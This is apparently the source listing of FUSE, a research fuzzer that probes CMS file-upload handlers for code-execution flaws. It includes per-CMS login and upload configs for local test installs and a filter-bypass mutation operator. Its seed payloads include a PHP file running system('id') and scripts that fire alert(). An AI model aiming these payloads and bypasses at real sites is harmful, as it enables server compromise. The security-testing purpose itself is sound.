├── tester
    ├── __init__.py
    ├── utils.py
    └── mutation_tester.py
├── mutation_op
    ├── __init__.py
    ├── mutation_op.py
    ├── m05.py
    ├── m12_html.py
    ├── m13.py
    ├── m09.py
    ├── m03_jpg.py
    ├── m03_pdf.py
    ├── m03_zip.py
    ├── m11.py
    ├── m12_xhtml.py
    ├── m04_gif.py
    ├── m04_png.py
    ├── m04_jpg.py
    ├── m02_jsgif.py
    ├── m02_pdf.py
    ├── m01_jpg.py
    ├── m01_gif.py
    ├── m01_zip.py
    ├── m01_pdf.py
    ├── m01_png.py
    ├── m01_tar_gz.py
    ├── m02_jpg.py
    ├── m02_jsbmp.py
    ├── m04_zip.py
    ├── m04_tar_gz.py
    ├── m04_txt.py
    ├── m04_pdf.py
    ├── m02_png.py
    ├── m08.py
    ├── m02_zip.py
    ├── m04_xht.py
    ├── m02_gif.py
    ├── m12_xht.py
    ├── m12_xla.py
    ├── m12_gzip.py
    ├── m12_m4v.py
    ├── m12_pages.py
    ├── m06.py
    ├── m04_phar.py
    ├── m04_php3.py
    ├── m04_php4.py
    ├── m04_php5.py
    ├── m04_php7.py
    ├── m04_pht.py
    ├── m04_phtml.py
    ├── m12_txt.py
    ├── m04_m4v.py
    ├── m04_xla.py
    ├── m04_gzip.py
    ├── m04_pages.py
    ├── m12_zip.py
    ├── m10.py
    ├── m12_jpg.py
    ├── m12_pdf.py
    ├── m12_png.py
    ├── m12_tar_gz.py
    ├── m12_gif.py
    └── m07.py
├── .gitignore
├── resource
    ├── test.bmp
    ├── test.gif
    ├── test.jpg
    ├── test.pdf
    ├── test.png
    ├── test.zip
    └── test.tar.gz
├── requirements.txt
├── seed
    ├── seed.php
    ├── seed.js
    ├── seed.html
    └── seed.xhtml
├── configs
    ├── default-credential.conf
    ├── anchor-credential.conf
    ├── joomla-credential.conf
    ├── bludit-credential.conf
    ├── subrion-credential-non-monitor.conf
    ├── codiad-credential.conf
    ├── elgg-credential.conf
    ├── cmsmadesimple-credential-non-monitor.conf
    ├── dotplant2-credential.conf
    ├── phpbb3_credential.conf
    ├── pagekit-credential.conf
    ├── cmsimple-credential-non-monitor.conf
    ├── webid-credential-non-monitor.conf
    ├── textpattern-credential.conf
    ├── clipper-credential-non-monitor.conf
    ├── monstra-credential-non-monitor.conf
    ├── x2engine-new-credential.conf
    ├── microweber-credential.conf
    ├── zencart-credential-non-monitor.conf
    ├── octobercms-credential.conf
    ├── symphony-credential.conf
    ├── concrete5-credential-non-monitor_new.conf
    ├── composr-credential.conf
    ├── concrete5-credential-non-monitor.conf
    ├── getsimplecms-credential-non-monitor.conf
    ├── collabtive-credential-mk2-non-monitor.conf
    ├── mybb-credential.conf
    ├── eccube-credential-non-monitor.conf
    ├── wordpress-credential.conf
    ├── silverstripe-credential-non-monitor.conf
    ├── xe-credential.conf
    ├── oscommerce2-credential-non-monitor.conf
    ├── hotcrp-credential.conf
    ├── drupal-credential-nonmonitor.conf
    └── README.md
├── utils.py
├── rabbitmq.py
├── README.md
├── filemutator.py
└── filemonitor.py


/tester/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/mutation_op/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/tester/utils.py:
--------------------------------------------------------------------------------
1 | ../utils.py


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | *.swp
3 | 


--------------------------------------------------------------------------------
/resource/test.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.bmp


--------------------------------------------------------------------------------
/resource/test.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.gif


--------------------------------------------------------------------------------
/resource/test.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.jpg


--------------------------------------------------------------------------------
/resource/test.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.pdf


--------------------------------------------------------------------------------
/resource/test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.png


--------------------------------------------------------------------------------
/resource/test.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.zip


--------------------------------------------------------------------------------
/resource/test.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.tar.gz


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | beautifulsoup4==4.6.0
2 | pyinotify==0.9.6
3 | pika==0.12.0
4 | selenium==3.14.1
5 | 


--------------------------------------------------------------------------------
/seed/seed.php:
--------------------------------------------------------------------------------
1 | <?php system('id');$sign=pack('H*',dechex((2534024256545858215*2)));print "<script>alert('".$sign."');</script>";?><!--%unique#-->
2 | 


--------------------------------------------------------------------------------
/seed/seed.js:
--------------------------------------------------------------------------------
1 | var genHead = ((589998498*2+1).toString(16)).match(/.{1,2}/g);for(var i=0;i<genHead.length;i++){genHead[i]=String.fromCharCode(parseInt(genHead[i],16))};genHead=genHead.join('');var genTail = ((799253159*2).toString(16)).match(/.{1,2}/g);for(var i=0;i<genTail.length;i++){genTail[i]=String.fromCharCode(parseInt(genTail[i],16))};genTail=genTail.join('');var appenddiv = document.createElement('div');appenddiv.id = genHead+genTail;document.getElementsByTagName('body')[0].appendChild(appenddiv);alert(genHead+genTail);//<!--%unique#-->


--------------------------------------------------------------------------------
/seed/seed.html:
--------------------------------------------------------------------------------
1 | <html><head><title>FUSESEED-HTML</title></head><body><script>/*<![CDATA[*/var genHead = ((589998498*2+1).toString(16)).match(/.{1,2}/g);for(var i=0;i<genHead.length;i++){genHead[i]=String.fromCharCode(parseInt(genHead[i],16))};genHead=genHead.join('');var genTail = ((799253159*2).toString(16)).match(/.{1,2}/g);for(var i=0;i<genTail.length;i++){genTail[i]=String.fromCharCode(parseInt(genTail[i],16))};genTail=genTail.join('');var appenddiv = document.createElement('div');appenddiv.id = genHead+genTail;document.getElementsByTagName('body')[0].appendChild(appenddiv);alert(genHead+genTail);/*]]>*/</script></body></html><!--%unique#-->
2 | 


--------------------------------------------------------------------------------
/configs/default-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID =  
 4 | PW = 
 5 | WebRootPath = 
 6 | WebHost = 
 7 | WebLoginIDName = 
 8 | WebLoginPWName = 
 9 | WebLoginURL = 
10 | WebLoginPageURL = 
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue =  
13 | WebLoginSuccessStr = 
14 | WebUploadURL = 
15 | WebUploadPageURL = 
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr =
20 | WebUploadAdditionalValue =
21 | WebUploadedFileUrlPattern = 
22 | WebUploadFilesURL = 
23 | WebUploadFilesParameter = 
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = True
29 | MonitorHost = 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/mutation_op/mutation_op.py:
--------------------------------------------------------------------------------
 1 | from abc import *
 2 | 
 3 | class MutationOP:
 4 | 
 5 |   __metaclass__ = ABCMeta
 6 | 
 7 |   # Attribute for each operations
 8 |   __comment__ = "Base Class"
 9 |   __mutate_type__ = ""  # (file|request) ; type of target
10 |   __exclusion_op__ = {} # ({type:[classname]})when this op used for mutation,
11 |                         # operations in this list can be used to extra mutation.
12 |   __resource__ = {"":""} # ({type:resource filename})
13 |   __seed_dependency__ = [] # ([filetype]) ; seed file dependency for operation
14 | 
15 | 
16 |   # Maybe, we need to chage seed_file to request later
17 | #  def __init__(self):
18 | #    self.output = output
19 | 
20 |   @abstractmethod
21 |   def operation(self):
22 |     pass
23 | 


--------------------------------------------------------------------------------
/seed/seed.xhtml:
--------------------------------------------------------------------------------
1 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>FUSESEED-XHTML</title></head><body><p>FUSE TEST</p><script>/*<![CDATA[*/var genHead = ((589998498*2+1).toString(16)).match(/.{1,2}/g);for(var i=0;i<genHead.length;i++){genHead[i]=String.fromCharCode(parseInt(genHead[i],16))};genHead=genHead.join('');var genTail = ((799253159*2).toString(16)).match(/.{1,2}/g);for(var i=0;i<genTail.length;i++){genTail[i]=String.fromCharCode(parseInt(genTail[i],16))};genTail=genTail.join('');var appenddiv = document.createElement('div');appenddiv.id = genHead+genTail;document.getElementsByTagName('body')[0].appendChild(appenddiv);alert(genHead+genTail);/*]]>*/</script></body></html><!--%unique#-->
2 | 


--------------------------------------------------------------------------------
/utils.py:
--------------------------------------------------------------------------------
 1 | import mimetypes
 2 | import datetime
 3 | import hashlib
 4 | 
 5 | def print_mutate_information(mutate_list, seed_file, resource_file):
 6 |   print '[*] Mutation Information'
 7 |   print '[*] mutate_list:', mutate_list
 8 |   print '[*] seed_file:', seed_file
 9 |   print '[*] resource_file', resource_file
10 |   print '\n'
11 | 
12 | def extract_content(path):
13 |   with open(path, "rb") as f:
14 |     content = f.read()
15 |   return content
16 | 
17 | def extract_fileext(path):
18 |   return path.split('.')[-1]
19 | 
20 | def extract_filename(path):
21 | #  return path.split('/')[-1].split('.')[0]
22 |   return hashlib.md5(datetime.datetime.now().__str__()).hexdigest()
23 | 
24 | def extract_filetype(path):
25 |   return mimetypes.guess_type(path)[0] or 'application/octet-stream'
26 | 
27 | def getMD5hash(binary):
28 |   return hashlib.md5(binary).hexdigest() 
29 | 


--------------------------------------------------------------------------------
/configs/anchor-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = user
 8 | WebLoginPWName = pass
 9 | WebLoginURL = http://127.0.0.1/anchor/admin/login
10 | WebLoginPageURL = http://127.0.0.1/anchor/admin/login
11 | WebLoginCSRFName = token
12 | WebLoginAdditionalValue =  
13 | WebLoginSuccessStr = logout">Logout</a>
14 | WebUploadURL = http://127.0.0.1/anchor/admin/upload
15 | WebUploadPageURL = http://127.0.0.1/anchor/admin/posts/add
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader = 
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr = %filename#
20 | WebUploadAdditionalValue = file=%filebinary#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/anchor/content/%filename#
22 | WebUploadFilesURL = 
23 | WebUploadFilesParameter = 
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/mutation_op/m05.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation 5: Change PHP tag to short tag"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 | 
 8 |   # XXX: Fill the exclusion operator and seed dependency
 9 |   __exclusion_op__ = {'php':['M05']}# [] # ([classname])when this op used for mutation,
10 |                         # operations in this list can be used to extra mutation.
11 |   __resource__ = {} # ({type:resource filename})
12 |   __seed_dependency__ = __exclusion_op__.keys()#self.__exclusion_op__.keys()#['php'] # seed file dependency for operation
13 | 
14 |   def operation(self, output, seed_file, resource_file=None):
15 |       output['content'] = output['content'].replace('<?php', '<?')
16 |       if output['filename'] != None and len(output['filename']) > 0:
17 |         filename = output['filename']
18 |       else:
19 |         filename = utils.extract_filename(seed_file)
20 |       output['filename'] = filename + '_M5'
21 | 


--------------------------------------------------------------------------------
/configs/joomla-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = passwd
 9 | WebLoginURL = http://127.0.0.1/joomla/administrator/index.php
10 | WebLoginPageURL = http://127.0.0.1/joomla/administrator/index.php
11 | WebLoginCSRFName = %reg:[0-9|a-f]{32}#
12 | WebLoginAdditionalValue = option=com_login;task=login;return=aW5kZXgucGhw
13 | WebLoginSuccessStr = >Logout</a>
14 | WebUploadURL = %find#
15 | WebUploadPageURL = http://127.0.0.1/joomla/administrator/index.php?option=com_media&folder=test
16 | WebUploadFormAttr = id=uploadForm
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = 
19 | WebUploadSuccessStr = >Logout</a>
20 | WebUploadAdditionalValue = task
21 | WebUploadedFileUrlPattern =
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = True
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/bludit-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = admin
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/bludit/admin/
10 | WebLoginPageURL = http://127.0.0.1/bludit/admin/
11 | WebLoginCSRFName = tokenCSRF 
12 | WebLoginAdditionalValue = save=
13 | WebLoginSuccessStr = </span>Log out</a>
14 | WebUploadURL = http://127.0.0.1/bludit/admin/ajax/upload-images
15 | WebUploadPageURL = http://127.0.0.1/bludit/admin/new-content
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = tokenCSRF
19 | #WebUploadSuccessStr = "status":0,"m
20 | WebUploadSuccessStr = "
21 | WebUploadAdditionalValue = uuid=%domtoken:uuid: "[a-z|0-9]{32}"@[a-z|0-9]{32}#;bluditInputFiles[]=%filebinary#
22 | WebUploadedFileUrlPattern = 
23 | WebUploadFilesURL = 
24 | WebUploadFilesParameter = 
25 | 
26 | [DETECTOR_CONF]
27 | 
28 | MutationChainLimit = 99
29 | MonitorEnable = True
30 | MonitorHost = 127.0.0.1 
31 | MonitorPort = 
32 | 


--------------------------------------------------------------------------------
/configs/subrion-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/subrion/panel/
10 | WebLoginPageURL = http://127.0.0.1/subrion/panel/
11 | WebLoginCSRFName = __st
12 | WebLoginAdditionalValue = 
13 | WebLoginSuccessStr = <span>Logout</span>
14 | WebUploadURL = http://127.0.0.1/subrion/panel/uploads/read.json 
15 | WebUploadPageURL = http://127.0.0.1/subrion/panel/uploads/
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = __st
19 | WebUploadSuccessStr = %notin="result":false#
20 | WebUploadAdditionalValue = reqid=167130a931033;cmd=upload;target=l1_Lw;upload[]=%filebinary#;mtime[]=1541137352
21 | WebUploadedFileUrlPattern = http://127.0.0.1/subrion/uploads/%filename#
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/codiad-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/codiad/components/user/controller.php?action=authenticate 
10 | WebLoginPageURL = http://127.0.0.1/codiad/
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue = theme=default;language=en
13 | WebLoginSuccessStr = success
14 | WebUploadURL = http://127.0.0.1/codiad/components/filemanager/controller.php?action=upload&path=test 
15 | WebUploadPageURL = http://127.0.0.1/codiad/components/filemanager/dialog_upload.php?path=test
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr = %filename#
20 | WebUploadAdditionalValue = upload[]=%filebinary#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/codiad/workspace/test/%filename#
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/elgg-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/elgg/action/login
10 | WebLoginPageURL = http://127.0.0.1/elgg/
11 | WebLoginCSRFName = __elgg_token;__elgg_ts
12 | WebLoginAdditionalValue = returntoreferer=true  
13 | WebLoginSuccessStr = <p>You have been logged in.</p>
14 | WebUploadURL = http://127.0.0.1/elgg/action/file/upload
15 | WebUploadPageURL = http://127.0.0.1/elgg/file/add/36
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = __elgg_token;__elgg_ts
19 | #WebUploadSuccessStr = %filename#
20 | WebUploadSuccessStr = <!DOCTYPE html>
21 | WebUploadAdditionalValue = upload=%filebinary#;title=%filename#;description=<p>as</p>;tags=5;access_id=2;container_guid=36;file_guid=
22 | WebUploadedFileUrlPattern =
23 | WebUploadFilesURL =
24 | WebUploadFilesParameter =
25 | 
26 | [DETECTOR_CONF]
27 | 
28 | MutationChainLimit = 99
29 | MonitorEnable = True
30 | MonitorHost = 127.0.0.1
31 | MonitorPort = 
32 | 


--------------------------------------------------------------------------------
/configs/cmsmadesimple-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/cmsms/admin/login.php
10 | WebLoginPageURL = http://127.0.0.1/cmsms/admin/login.php
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue = loginsubmit=Submit
13 | WebLoginSuccessStr = Logout</a>
14 | WebUploadURL = http://127.0.0.1/cmsms/admin/moduleinterface.php
15 | WebUploadPageURL = http://127.0.0.1/cmsms/admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&__c=%cookie:__c#
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = 
19 | WebUploadSuccessStr = "url":
20 | WebUploadAdditionalValue = mact=FileManager,m1_,upload,0;disable_buffer=1;m1_files[]=%filebinary#;__c=%cookie:__c#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/cmsms/uploads/%filename#
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/dotplant2-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/dotplant2/web/
 6 | WebHost = http://127.0.0.1:8880
 7 | WebLoginIDName = LoginForm[username]
 8 | WebLoginPWName = LoginForm[password]
 9 | WebLoginURL = http://127.0.0.1:8880/login
10 | WebLoginPageURL = http://127.0.0.1:8880/login
11 | WebLoginCSRFName = _csrf;%cookietoken#
12 | WebLoginAdditionalValue = LoginForm[rememberMe]=0;LoginForm[rememberMe]=1
13 | WebLoginSuccessStr = >Logout</a>
14 | WebUploadURL = http://127.0.0.1:8880/page/backend/upload
15 | WebUploadPageURL = http://127.0.0.1:8880/page/backend/edit?id=2&returnUrl=%2Fpage%2Fbackend%2Findex&parent_id=1
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = _csrf;%cookietoken#
19 | WebUploadSuccessStr = "file":"
20 | WebUploadAdditionalValue = file=%filebinary#;modelId=2;objectId=1
21 | WebUploadedFileUrlPattern = /files/[a-z|0-9|\_|\-|\.]*\.[a-z|0-9]*
22 | WebUploadFilesURL = 
23 | WebUploadFilesParameter = 
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/phpbb3_credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/phpbb3/ucp.php?mode=login
10 | WebLoginPageURL = http://127.0.0.1/phpbb3/ucp.php?mode=login 
11 | WebLoginCSRFName = sid
12 | WebLoginAdditionalValue = redirect=./ucp.php?mode=login;redirect=index.php;login=Login
13 | WebLoginSuccessStr = "username-coloured"
14 | WebUploadURL = http://127.0.0.1/phpbb3/posting.php?mode=post&f=2
15 | WebUploadPageURL = http://127.0.0.1/phpbb3/posting.php?mode=post&f=2
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | #WebUploadSuccessStr = %filename#
20 | WebUploadSuccessStr = "
21 | WebUploadAdditionalValue = name=%filename#;chunk=0;chunks=1;add_file=Add the file;real_filename=%filename#;fileupload=%filebinary#
22 | WebUploadedFileUrlPattern =
23 | WebUploadFilesURL =
24 | WebUploadFilesParameter =
25 | 
26 | [DETECTOR_CONF]
27 | 
28 | MutationChainLimit = 99
29 | MonitorEnable = True
30 | MonitorHost = 127.0.0.1
31 | MonitorPort = 
32 | 


--------------------------------------------------------------------------------
/configs/pagekit-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = credentials[username]
 8 | WebLoginPWName = credentials[password]
 9 | WebLoginURL = http://127.0.0.1/pagekit/user/authenticate
10 | WebLoginPageURL = http://127.0.0.1/pagekit/admin/login
11 | WebLoginCSRFName = _csrf
12 | WebLoginAdditionalValue = redirect=/pagekit/admin
13 | WebLoginSuccessStr = logout?redirect=admin/login
14 | WebUploadURL = http://127.0.0.1/pagekit/system/finder/upload
15 | WebUploadPageURL = http://127.0.0.1/pagekit/admin/site/storage
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr = message":"Upload complete.
20 | WebUploadAdditionalValue = files[]=%filebinary#;path=/test;root=storage;_csrf=%domtoken:"csrf":"[0-9|a-f]{40}@[0-9|a-f]{40}#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/pagekit/storage/test/%filename#
22 | WebUploadFilesURL = 
23 | WebUploadFilesParameter = 
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/cmsimple-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID =  
 4 | PW = vu!nweb321 
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = user
 8 | WebLoginPWName = passwd
 9 | WebLoginURL = http://127.0.0.1/cmsimple/?Welcome_to_CMSimple
10 | WebLoginPageURL = http://127.0.0.1/cmsimple/?Welcome_to_CMSimple
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue = login=true;selected=Welcome_to_CMSimple;submit=Login
13 | WebLoginSuccessStr = Logout</a>
14 | WebUploadURL = http://127.0.0.1/cmsimple/?userfiles&subdir=userfiles/downloads/
15 | WebUploadPageURL = http://127.0.0.1/cmsimple/?userfiles&subdir=userfiles/downloads/
16 | WebUploadFormAttr =  
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = csrf_token
19 | WebUploadSuccessStr = %notin=cmsimplecore_warning#
20 | WebUploadAdditionalValue = fbupload=%filebinary#;upload=upload
21 | WebUploadedFileUrlPattern = http://127.0.0.1/cmsimple/userfiles/downloads/%filename#
22 | WebUploadFilesURL = 
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/webid-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/webid/admin/login.php
10 | WebLoginPageURL = http://127.0.0.1/webid/admin/login.php
11 | WebLoginCSRFName = csrftoken
12 | WebLoginAdditionalValue = action=login;submit=Login
13 | WebLoginSuccessStr = Logged in as:
14 | WebUploadURL = http://127.0.0.1/webid/admin/logo_upload.php
15 | WebUploadPageURL = http://127.0.0.1/webid/admin/logo_upload.php
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = csrftoken
19 | #WebUploadSuccessStr = Logo uploaded successfully
20 | WebUploadSuccessStr = %notin=alert alert-error#
21 | WebUploadAdditionalValue = action=update;act=Upload Logo;logo=%filebinary#
22 | WebUploadedFileUrlPattern = http://127.0.0.1/webid/uploaded/logo/%filename#
23 | WebUploadFilesURL =
24 | WebUploadFilesParameter =
25 | 
26 | [DETECTOR_CONF]
27 | 
28 | MutationChainLimit = 99
29 | MonitorEnable = False
30 | MonitorHost = 127.0.0.1
31 | MonitorPort = 
32 | 
33 | 


--------------------------------------------------------------------------------
/configs/textpattern-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html
 6 | WebHost = http://127.0.0.1/
 7 | WebLoginIDName = p_userid
 8 | WebLoginPWName = p_password
 9 | WebLoginURL = http://127.0.0.1/textpattern/textpattern/index.php
10 | WebLoginPageURL = http://127.0.0.1/textpattern/textpattern/index.php
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue = _txp_token=
13 | WebLoginSuccessStr = gout=1">Log out</a></p
14 | WebUploadURL = http://127.0.0.1/textpattern/textpattern/index.php?event=file
15 | WebUploadPageURL = http://127.0.0.1/textpattern/textpattern/index.php?event=file
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = _txp_token
19 | WebUploadSuccessStr = Files uploaded
20 | WebUploadAdditionalValue = event=file;step=file_insert;id=;thefile[]=%filebinary#;app_mode=async;MAX_FILE_SIZE=20000000
21 | WebUploadedFileUrlPattern = http://127.0.0.1/textpattern/files/%filename#
22 | WebUploadFilesURL = 
23 | WebUploadFilesParameter = 
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/clipper-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/clipper/manager/processors/login.processor.php
10 | WebLoginPageURL = http://127.0.0.1/clipper/manager/
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue = ajax=1
13 | WebLoginSuccessStr = Location
14 | WebUploadURL = http://127.0.0.1/clipper/manager/index.php?a=31 
15 | WebUploadPageURL = http://127.0.0.1/clipper/manager/index.php?a=31&mode=drill&path=%2Fvar%2Fwww%2Fhtml%2Fclipper%2Ftest
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr = File uploaded successfully!
20 | WebUploadAdditionalValue = MAX_FILE_SIZE=2000000;path=/var/www/html/clipper/test;userfile[0]=%filebinary#;userfile[1]=%filebinary#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/clipper/test/%filename#
22 | WebUploadFilesURL = 
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
